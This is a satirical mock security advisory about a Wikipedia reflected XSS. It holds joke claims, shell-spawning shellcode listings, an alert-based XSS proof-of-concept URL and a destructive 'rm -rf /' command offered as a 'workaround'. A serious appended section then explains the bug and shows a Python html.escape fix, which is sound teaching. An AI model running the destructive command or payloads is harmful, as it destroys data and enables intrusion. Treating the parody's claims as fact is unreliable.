[RingoBingo Secuity] Wikipedia Reflected XSS (Unresponsive-Conpulsive Disclosure)

RingoBingo TM Security Advisory 09.08.10
http://labs.ringobingo.net/intelligence/vulnerabilities/
Sep 8, 2010

I. BACKGROUND

RingoBingo Secuity TM has finally been acquired by Hewlatt Pachard TM for ~11.5M this weekend, in a secret meeting at a location near Hanover Street. The deal was signed on Sunday at 12:45 GGM+1,5. The IP agreements between the parties require RingoBingo TM to perform Unresponsive-Conpulsive Disclosure of undisclosed cyber-arms, to prevent improper dissemination of Copyrights and Other Things TM on the web. While aware that there are many employees of the Internet whose sole scope is Internet washing, it is of primary importance to disseminate this information, to prevent proper exploitation by multiple parties and to reduce the global exposure. Hewlatt Pachard TM analysts also demonstrated how it is possible to reduce energy consumption by raising the global threatcon, as red colors consume less power to display than green or yellow/orange ones.

II. DESCRIPTION

Wikipedia TM software contains code written by an intern of Hewlatt Pachard TM and has undocumented vulnerabilities. Since here at RingoBingo Secuity TM we treat man page and documentation errors as security issues, we urge all the involved, uninvolved and retroinvolved (as well as the underinvolved/underdesk) parties to patch their man pages by adding the string "-enable-write18" to the parameter list of Wikipedia TM.

During a 53-day-long penetration test, and for the sole purpose of a proof of concept, our security team was able to successfully access more than 3,400,000 internal pages of the Wikipedia TM system, considering only the English-language subsystem. It can be seen that only drastic measures can prevent a large-scale leakage.

Moreover, we think that, if correctly exploited, this vulnerability can potentially make the core content of the Wikipedia (TM) system world-writable, *even without the need for a privilege escalation*, with easily foreseeable consequences.

III. ANALYSIS

The vulnerability is present in different Wikipedia PHP files. Let's analyze one of them. By reverse engineering the file, we obtain the following asm code:

    7c0802a6 mfspr r0,LR
    9421fbb0 stu SP,-1104(SP)
    90010458 st r0,1112(SP)
    3c60f019 cau r3,r0,0xf019
    60632c48 lis r3,r3,11336
    90610440 st r3,1088(SP)
    3c60d002 cau r3,r0,0xd002
    60634c0c lis r3,r3,19468
    90610444 st r3,1092(SP)
    3c602f62 cau r3,r0,0x2f62
    6063696e lis r3,r3,26990
    90610438 st r3,1080(SP)
    3c602f73 cau r3,r0,0x2f73
    60636801 lis r3,r3,26625
    3863ffff addi r3,r3,-1
    9061043c st r3,1084(SP)
    30610438 lis r3,SP,1080
    7c842278 xor r4,r4,r4
    80410440 lwz RTOC,1088(SP)
    80010444 lwz r0,1092(SP)
    7c0903a6 mtspr CTR,r0
    4e800420 bctr

RingoBingo EST (Elite Security Team) was aware of the vulnerability and took the situation in hand. The team started looking for a way to subvert the application and reverse engineered the code again, obtaining the following:

    sub $9,$9,$9
    add $29,$29,-444
    sw $9,444($29)
    add $29,$29,444
    add $29,$29,-4
    lui $8,0x2f2f
    ori $8,$8,0x7368
    addi $29,$29,-444
    sw $8,444($29)
    addi $29,$29,444
    addi $29,$29,-4
    lui $8,0x2f62
    ori $8,$8,0x696e
    addi $29,$29,-444
    sw $8,444($29)
    addi $29,$29,444
    addi $29,$29,-4
    sw $29,444($29)
    lw $4,444($29)
    addi $4,$4,460
    addi $4,$4,-456
    sub $9,$9,$9
    addi $29,$29,-444
    sw $9,444($29)
    addi $29,$29,444
    addi $29,$29,-444
    sw $4,440($29)
    sw $29,436($29)
    lw $5,436($29)
    addi $5,$5,440
    sub $9,$9,$9
    andi $6,$9,0xffff
    li $2,1059
    syscall

THIS was the final and easy-to-read code that RingoBingo EST was looking for. One of the RingoBingo EST interns recognized this code: he wrote it during a hard-toilet session at his house in Long Beach, and was surprised that his code was used in Wikipedia PHP scripts.

He noticed some slight differences between this and his original code, as you can see from these lines:

    sw $9,444($29)
    addi $29,$29,444
    addi $29,$29,-444
    sw $4,440($29)
    sw $29,436($29)

The execution flow is modified by some external influences that will cost the developer 9,444 US dollars. Again, the math got some miscalculations, as 444 was first added and then subtracted (-444). By adding a multiplicative factor of 4,440 we obtain the total amount to pay: 29,436 US fuckin' dollars.

This is a very, very uncommon, critical and hard-to-exploit vulnerability. Our top researchers worked on this for 15'000 days, 24/7, to produce a working and very user-unfriendly PoC that allows command execution with root privileges in the context of a little circle printed on a little piece of paper in an anonymous mailbox in Panama. Here's the PoC:

    http://en.m.wikipedia.org/wiki?search=%27%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E

IV. DETECTION

Detection of this vulnerability is pretty easy. You have to wait for moonlight and hope that it's a full-moon night. Then, you need some new-technology 3D glasses to identify the monitor interference caused by this vulnerability. Once equipped with this technology, you have to count all the prime numbers from 1 to 31337 in Chinese (Wikipedia IS international), and perform a mind-race-condition by repeating the last prime number 1-3 thousand times. If this mind-race-condition occurs, you will be able to find the vulnerable PHP scripts on Wikipedia. Oh, I forgot the last condition: you need to be asleep while performing these actions. Otherwise your neural waves will interfere with the monitor frequencies and the second step of this detection (3D glasses) will fail. That's it.

V. WORKAROUND

Simply shut down your services. Our proven and tested technology called "Book" can protect your assets and your clients.

Update if you are in the +5 timezone: the following command will fix the vulnerability while the vendor produces the proper patch:

    ssh root [at] wikipedia rm -rf / & disown

VI. VENDOR RESPONSE

We don't believe in responses. We believe in under-deep security and proactive man page reading.

VII. CVE INFORMATION

VIII. DISCLOSURE TIMELINE

217921.676106 - Man page iSCSI access in read-only
217921.681169 - First I/O error (seek is high, high, high)
At this point HAL was shut down.
April 3rd, 0033, 05:55:23 - Sent a mail to vendor but the grave was empty, he resurrected
October 10th, 1492, 12:56:22 - Sent a mail to American Headquarters but they didn't understand English
July 28th, 1914, 19:12:59 - Sent a mail to European Headquarters but First World War started
July 1st, 2001, 13:23:53 - Sent a mail to actual vendor, but product (Wikipedia) was not released yet
May 14th, 2045, 22:19:23 - Sent a mail to vendor, with a time machine
May 15th, 2045, 22:19:22 - Vendor response, fix ready
September 9th, 2010, 01:13:23 - Came back to the present and advisory released

You are free to hack until May 15th 2045... enjoy the freshness!
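Behind the jokes, the PoC URL in section III is an ordinary reflected XSS: the value of the search parameter is written back into the response without HTML encoding, so the leading '"> closes whatever attribute it lands in and the rest of the payload becomes live markup. The following Python is an added example, not code from the advisory or from MediaWiki: the two rendering functions are hypothetical stand-ins for a search-form template, and the check uses the standard-library HTML parser to show what each rendering actually yields and why contextual output encoding (html.escape with quote=True, since the value sits inside a double-quoted attribute) is the fix.

```python
"""Added example: reflected search term, vulnerable vs. encoded rendering.

render_unsafe/render_safe are hypothetical stand-ins for a page template;
they are not the real Wikipedia/MediaWiki code.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The PoC URL quoted in the advisory (section III).
POC_URL = ("http://en.m.wikipedia.org/wiki?search="
           "%27%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E")


def search_term(url: str) -> str:
    """Return the percent-decoded value of the 'search' query parameter."""
    return parse_qs(urlsplit(url).query).get("search", [""])[0]


def render_unsafe(term: str) -> str:
    """Vulnerable template: the term is concatenated into an attribute verbatim."""
    return f'<input type="text" name="search" value="{term}">'


def render_safe(term: str) -> str:
    """Hardened template: encode for the HTML attribute context.

    quote=True also turns ' and " into entities, which is what keeps the
    payload from closing the value="..." attribute it is written into.
    """
    return f'<input type="text" name="search" value="{html.escape(term, quote=True)}">'


class _FormInspector(HTMLParser):
    """Records what a browser-like tokenizer would see: the input's value
    attribute and the number of <script> start tags."""

    def __init__(self) -> None:
        super().__init__()
        self.value = None
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        if tag == "input":
            # HTMLParser decodes entities in attribute values for us.
            self.value = dict(attrs).get("value")


def inspect(markup: str):
    """Return (value attribute as parsed, count of <script> start tags)."""
    p = _FormInspector()
    p.feed(markup)
    p.close()
    return p.value, p.script_tags


if __name__ == "__main__":
    term = search_term(POC_URL)
    print("reflected term:", repr(term))
    print("unsafe :", render_unsafe(term), "->", inspect(render_unsafe(term)))
    print("encoded:", render_safe(term), "->", inspect(render_safe(term)))
```

Running it shows the unsafe rendering parsed as an input whose value is just the single quote, followed by a real script element, while the encoded rendering parses back to an input whose value is the complete original term and contains no script element at all. The payload is stored unchanged; it is only its representation in the HTML attribute context that is neutralised, which is why encoding at output time (per context) rather than input filtering is the durable fix for this class of bug.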